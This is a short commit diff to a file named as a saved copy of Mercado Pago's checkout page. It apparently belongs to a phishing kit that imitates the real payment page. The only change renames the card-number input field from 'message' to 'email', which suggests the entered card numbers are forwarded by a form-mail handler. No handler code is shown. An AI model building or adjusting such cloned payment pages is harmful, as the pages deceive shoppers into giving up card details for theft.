Update Mercado Pago - Checkout.html

--- a/payment/Mercado Pago - Checkout.html
+++ b/payment/Mercado Pago - Checkout.html
@@ -71,7 +71,7 @@
   <label class="andes-form-control andes-form-control--textfield input-card-number ui-input-text">
   <div class="andes-form-control__control">
   <span class="andes-form-control__label andes-form-control__label-fixed">Numero de tarjeta</span>
-  <input id="card_number" name="message" placeholder="16 digitos" type="tel" autocomplete="cc-number"     autocorrect="no" autocapitalize="no" spellcheck="no" step="card_form" rows="1" class="andes-form-control__field" maxlength="20" value="">
+  <input id="card_number" name="email" placeholder="16 digitos" type="tel" autocomplete="cc-number"     autocorrect="no" autocapitalize="no" spellcheck="no" step="card_form" rows="1" class="andes-form-control__field" maxlength="20" value="">
   <div class="andes-form-control__embedded">  </div></div><div class="andes-form-control__border"></div></label>
   
   
